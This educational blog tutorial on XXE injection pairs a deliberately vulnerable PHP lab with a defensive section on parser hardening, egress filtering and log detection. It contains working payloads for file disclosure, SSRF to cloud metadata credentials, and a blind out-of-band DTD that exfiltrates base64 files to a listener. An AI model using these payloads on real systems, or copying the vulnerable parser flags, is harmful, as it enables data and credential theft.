XXE Attacks: Exploiting XML External Entities for File Disclosure and Blind OOB Exfiltration

Disclaimer: This article is for education and authorized testing only. Run these techniques exclusively against systems you own or have explicit written permission to test. Unauthorized testing is illegal in most jurisdictions.

Introduction

XML External Entity (XXE) injection remains one of the most impactful server-side flaws in the OWASP catalogue. When an application parses attacker-controlled XML with a misconfigured parser, an attacker can read local files, reach internal services through server-side request forgery (SSRF), and, even when the application reflects nothing back, exfiltrate data through out-of-band (OOB) channels.

In this post you'll learn how XXE actually works at the parser level, how to confirm and exploit a classic file-disclosure XXE, and how to escalate to blind XXE with an external DTD and OOB exfiltration. We'll close with a Blue Team section that carries equal weight: how to detect and shut these attacks down.

How It Works

XML supports a feature called entities — placeholders that the parser expands at parse time. They are declared in a Document Type Definition (DTD), introduced with the <!DOCTYPE ...> declaration.

A normal internal entity simply substitutes a string:

<!DOCTYPE foo [ <!ENTITY name "yunolay"> ]>
<data>&name;</data>
XML

An external entity tells the parser to fetch content from a URI, and this is where the danger lies. The SYSTEM keyword takes a URI; file:// and http:// are widely supported, while ftp:// and other schemes (for example PHP's stream wrappers such as php://) depend on the parser:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>
XML

If the application reflects the parsed value back to the user, the contents of /etc/passwd appear in the response. The root cause is a parser that resolves external entities by default: historically Java's DocumentBuilderFactory, PHP built against libxml2 older than 2.9.0, .NET's XmlDocument, and many others.
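
To see the two entity types side by side without touching a vulnerable service, here is a minimal sketch using Python's standard-library xml.etree.ElementTree. Python is used only for illustration (the lab below is PHP), and the helper name expand is made up for this example. According to the Python documentation, this parser expands internal entities but does not expand external ones and raises ParseError when it meets one, which is how a safely configured parser should behave.

```python
import xml.etree.ElementTree as ET

# The two documents from the text, collapsed onto one line each
INTERNAL = '<!DOCTYPE foo [ <!ENTITY name "yunolay"> ]><data>&name;</data>'
EXTERNAL = '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><data>&xxe;</data>'


def expand(xml_text):
    """Parse xml_text and return the root element's text, or None if parsing fails."""
    try:
        return ET.fromstring(xml_text).text
    except ET.ParseError:
        # ElementTree does not resolve external entities; it rejects the reference
        return None


print(expand(INTERNAL))  # internal entity is substituted by the parser
print(expand(EXTERNAL))  # external entity is not fetched
```

A vulnerable parser would return the file contents for the second document instead of refusing it.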

When the response does not echo the entity, the attack becomes blind. We then chain a parameter entity with an external DTD to force the parser to make an outbound request carrying the stolen data — the OOB technique.

Prerequisites / Lab Setup

You need a vulnerable endpoint that accepts XML. The simplest local target is a small PHP service with the legacy resolver enabled:

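<?php
// index.php: DELIBERATELY VULNERABLE, lab only
// PHP < 8.0 only: make sure the entity loader is on (the call is deprecated from 8.0)
if (PHP_VERSION_ID < 80000) { libxml_disable_entity_loader(false); }
$xml = file_get_contents('php://input');
// LIBXML_NOENT substitutes entities, external ones included; LIBXML_DTDLOAD loads external DTDs
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT | LIBXML_DTDLOAD);
if ($doc === false) { http_response_code(400); exit('Invalid XML'); }
echo "Hello, " . $doc->name;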
PHP

Run it alongside an attacker-controlled "collaborator" listener:

# Terminal 1 — vulnerable app
php -S 127.0.0.1:8080

# Terminal 2 — OOB / exfil listener (also serves the malicious DTD)
python3 -m http.server 8000
Bash

For real engagements, Burp Suite Collaborator provides a unique DNS/HTTP catcher; the local http.server above is a stand-in.

Attack Walkthrough

1. Confirm XML parsing

Send a benign internal entity and check it expands:

curl -s http://127.0.0.1:8080/ \
  --data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY t "PROOF"> ]>
<root><name>&t;</name></root>'
# Response: "Hello, PROOF"  -> entities are processed
Bash
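
The same check can be scripted. The sketch below assumes the lab URL from the setup section; the function names build_probe, entities_expanded, and probe are hypothetical helpers for this example, not part of any tool.

```python
import urllib.request

TARGET = "http://127.0.0.1:8080/"  # lab URL from the setup above (assumption)


def build_probe(marker):
    """Return an XML body whose internal entity expands to `marker`."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE r [ <!ENTITY t "{marker}"> ]>\n'
        "<root><name>&t;</name></root>"
    )


def entities_expanded(response_text, marker):
    """True if the marker came back and the raw entity reference did not."""
    return marker in response_text and "&t;" not in response_text


def probe(url=TARGET, marker="PROOF"):
    """POST the probe to `url` and report whether the entity was expanded."""
    req = urllib.request.Request(
        url,
        data=build_probe(marker).encode(),
        headers={"Content-Type": "application/xml"},
    )
    with urllib.request.urlopen(req, timeout=5) as resp:
        body = resp.read().decode(errors="replace")
    return entities_expanded(body, marker)
```

Calling probe() against the running lab should return True; a False result suggests the endpoint either does not parse XML or does not process DTD entities.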

2. Classic file disclosure (in-band)

curl -s http://127.0.0.1:8080/ \
  --data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root><name>&xxe;</name></root>'
Bash

The response now contains /etc/passwd. On PHP targets, the php://filter wrapper base64-encodes files that would otherwise break the XML parser (e.g. source code containing <):

curl -s http://127.0.0.1:8080/ \
  --data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM
  "php://filter/convert.base64-encode/resource=/var/www/html/index.php"> ]>
<root><name>&xxe;</name></root>'
Bash

Strip the "Hello, " prefix from the response and pipe the rest to base64 -d to recover the source.
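
If you capture the response in a script instead, decoding takes a few lines. This sketch assumes the lab's "Hello, " prefix; decode_reflected is a hypothetical helper name.

```python
import base64
import re


def decode_reflected(response_text, prefix="Hello, "):
    """Strip the lab app's greeting and base64-decode what remains."""
    if response_text.startswith(prefix):
        response_text = response_text[len(prefix):]
    # Drop whitespace and restore any padding lost in transit
    b64 = re.sub(r"\s+", "", response_text)
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64)
```

For a different target, pass whatever text the application wraps around the reflected value as prefix.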

3. XXE to SSRF

Swap the file:// URI for an internal HTTP target to reach metadata services or internal apps:

<!DOCTYPE r [ <!ENTITY xxe SYSTEM
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]>
<root><name>&xxe;</name></root>
XML

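This is a common pivot into cloud credential theft; see also SSRF to cloud metadata. On AWS this path only answers when IMDSv1 is enabled: IMDSv2 requires a session token obtained with a PUT request and sent in a header, which an entity fetch cannot do.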

4. Blind XXE with OOB exfiltration

When nothing is reflected, host an external DTD on your listener. Save this as evil.dtd in the directory the http.server is serving:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://127.0.0.1:8000/?d=%file;'>">
%eval;
%exfil;
XML

Then submit a payload that pulls and triggers the external DTD via parameter entities (%):

curl -s http://127.0.0.1:8080/ \
  --data-binary '<?xml version="1.0"?>
<!DOCTYPE r [
  <!ENTITY % remote SYSTEM "http://127.0.0.1:8000/evil.dtd">
  %remote;
]>
<root><name>test</name></root>'
Bash

The parser fetches evil.dtd, reads the target file into %file, builds an entity whose URI embeds that data, and resolves it — sending a request to your listener:

127.0.0.1 - - "GET /?d=cm9vdDp4OjA6MDpyb290Oi9yb290... HTTP/1.0" 200
Plaintext

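Base64-decode the d parameter to recover the file. The external DTD is what makes this work: the XML specification forbids parameter-entity references inside markup declarations in the internal subset, so the %file; reference nested in the exfil declaration is only legal in an external DTD. The chain can also succeed where only general external entities are disabled, because parameter entities are governed by a separate parser setting. On targets without php://filter, raw file contents with newlines or other URL-unsafe characters tend to break the HTTP request; an FTP-based exfil DTD (using a tool like xxeftp / XXEinjector) is a common workaround.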
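
Rather than decoding log lines by hand, the plain http.server listener can be swapped for one that decodes the d parameter as requests arrive. This is a minimal sketch using only the standard library; ExfilHandler, decode_exfil, and serve are hypothetical names, and the port matches the lab setup.

```python
import base64
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import parse_qs, urlsplit


def decode_exfil(request_path):
    """Return the decoded `d` query parameter of a request path, or None if absent."""
    values = parse_qs(urlsplit(request_path).query).get("d")
    if not values:
        return None
    # parse_qs turns '+' into a space; base64 uses '+', so undo that
    b64 = values[0].replace(" ", "+")
    b64 += "=" * (-len(b64) % 4)  # restore stripped padding
    return base64.b64decode(b64)


class ExfilHandler(SimpleHTTPRequestHandler):
    """Serves files from the current directory (evil.dtd) and prints exfiltrated data."""

    def do_GET(self):
        data = decode_exfil(self.path)
        if data is not None:
            print(data.decode(errors="replace"))
        super().do_GET()


def serve(port=8000):
    """Run the listener until interrupted (lab use only)."""
    HTTPServer(("127.0.0.1", port), ExfilHandler).serve_forever()
```

Run serve() from the directory containing evil.dtd in place of python3 -m http.server 8000.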

Attack Flow Diagram

[Figure: blind OOB XXE attack flow]

The diagram shows the blind OOB chain: the app fetches the attacker's DTD, reads a local file, then leaks it back over an outbound request the attacker captures.

Detection & Defense (Blue Team)

XXE is fully preventable at the parser layer. Defense should be applied with the same rigor as any offensive testing.

1. Disable DTDs and external entities (primary control). This is the definitive fix.

// Java: DocumentBuilderFactory hardening
// (import javax.xml.parsers.DocumentBuilderFactory; setFeature throws ParserConfigurationException)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
Java

// .NET: safe XmlReader settings (namespace System.Xml)
var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver = null
};
C#

// PHP >= 8.0: external entities are off by default.
// libxml_disable_entity_loader() is deprecated as of PHP 8.0; do not rely on it.
// Avoid LIBXML_NOENT and LIBXML_DTDLOAD on untrusted input.
$doc = simplexml_load_string($xml); // no dangerous flags
PHP

2. Egress filtering. Block the application's outbound DNS/HTTP to arbitrary destinations. OOB and SSRF-based XXE both depend on the server making requests it never normally should. Deny-by-default egress neutralizes blind exfiltration.

3. WAF and input validation. Reject requests whose body contains <!DOCTYPE or <!ENTITY when your API does not legitimately need a DTD. This is a defense-in-depth signal, not a primary control.
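
Plain string matching on <!DOCTYPE can miss bodies sent in another encoding such as UTF-16. Where the service can afford a pre-parse, letting an XML parser detect the declaration is more robust. The sketch below assumes a Python service and uses the standard-library expat bindings; reject_doctype and DoctypeForbidden are hypothetical names.

```python
import xml.parsers.expat as expat


class DoctypeForbidden(ValueError):
    """Raised when an XML document carries a DOCTYPE declaration."""


def reject_doctype(xml_bytes):
    """Raise DoctypeForbidden if xml_bytes declares a DTD.

    Malformed XML raises xml.parsers.expat.ExpatError instead.
    """

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Abort at the first DOCTYPE, before any entity is declared or used
        raise DoctypeForbidden(f"DOCTYPE {name!r} not allowed")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)
```

Call reject_doctype(body) before handing the body to the application's real parser, and treat either exception as a 400 response.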

4. Detection rules. Hunt for these in WAF/proxy logs:

# Surface likely XXE attempts in access/body logs
grep -aiE '<!DOCTYPE|<!ENTITY|SYSTEM "file:|php://filter|169\.254\.169\.254' access.log
Bash

Alert on application servers initiating outbound connections to unexpected hosts, requests to 169.254.169.254, and file:// access patterns in parser error logs. Map this to MITRE ATT&CK T1190 (Exploit Public-Facing Application) and the SSRF pivot to T1552.005 (Cloud Instance Metadata API).
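
The grep hunt above can be sketched as a small scanner that also URL-decodes each line first, so percent-encoded payloads such as %3C%21DOCTYPE are caught. The pattern is the one from the grep command; the URL-decoding step and the name suspicious_lines are additions made for this example.

```python
import re
from urllib.parse import unquote

XXE_PATTERN = re.compile(
    r'<!DOCTYPE|<!ENTITY|SYSTEM "file:|php://filter|169\.254\.169\.254',
    re.IGNORECASE,
)


def suspicious_lines(lines):
    """Yield (line_number, line) for each log line matching an XXE indicator."""
    for number, line in enumerate(lines, start=1):
        # Decode percent-encoding so encoded payloads match the same pattern
        if XXE_PATTERN.search(unquote(line)):
            yield number, line.rstrip("\n")
```

To scan a file, open it with errors="replace" and pass the file object to suspicious_lines.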

5. Keep libraries patched. Track CVEs in your XML stack, for example CVE-2018-1000840 and the recurring XXE issues in office-document and SOAP parsers. Many frameworks now ship secure-by-default, but legacy services lag.

For broader server-side exploitation context, see Server-Side Template Injection.

Conclusion

XXE turns a routine XML endpoint into a file-read, SSRF, and data-exfiltration primitive. The classic in-band variant is easy to confirm and exploit; the blind OOB variant — using parameter entities and an external DTD — defeats applications that simply stop reflecting output. The good news for defenders is that a single, well-understood configuration (disable DTDs and external entities) eliminates the entire class. Combine that with strict egress controls and log-based detection, and XXE moves from "critical finding" to "non-issue."
